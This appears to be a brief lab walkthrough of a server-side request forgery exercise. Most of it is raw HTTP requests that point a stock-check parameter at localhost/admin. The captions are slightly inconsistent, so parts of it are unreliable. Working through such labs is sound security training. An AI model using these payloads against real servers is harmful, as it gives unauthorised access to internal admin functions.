Basic SSRF against the local server

Trying to access /admin gives us an error saying only localhost can.

Clicking on a product and on get stock launches a request from the server to a separate webiste. We can change that to go to localhost.

Original request:
POST /product/stock HTTP/1.1
Host: ac1a1f091f207efe80925f5b00140078.web-security-academy.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://ac1a1f091f207efe80925f5b00140078.web-security-academy.net/product?productId=1
Content-Type: application/x-www-form-urlencoded
Origin: https://ac1a1f091f207efe80925f5b00140078.web-security-academy.net
Content-Length: 100
Connection: close
Cookie: session=lpRWGjwWx4P2b9PW6eFSKR978KFualOl

stockApi=http%3A%2F%2Flocalhost/admin%3A8080%2Fproduct%2Fstock%2Fcheck%3FproductId%3D1%26storeId%3D1


Request used to delete carlos:

POST /product/stock HTTP/1.1
Host: ac1a1f091f207efe80925f5b00140078.web-security-academy.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://ac1a1f091f207efe80925f5b00140078.web-security-academy.net/product?productId=1
Content-Type: application/x-www-form-urlencoded
Origin: https://ac1a1f091f207efe80925f5b00140078.web-security-academy.net
Content-Length: 39
Connection: close
Cookie: session=lpRWGjwWx4P2b9PW6eFSKR978KFualOl

stockApi=http%3A%2F%2Flocalhost%2Fadmin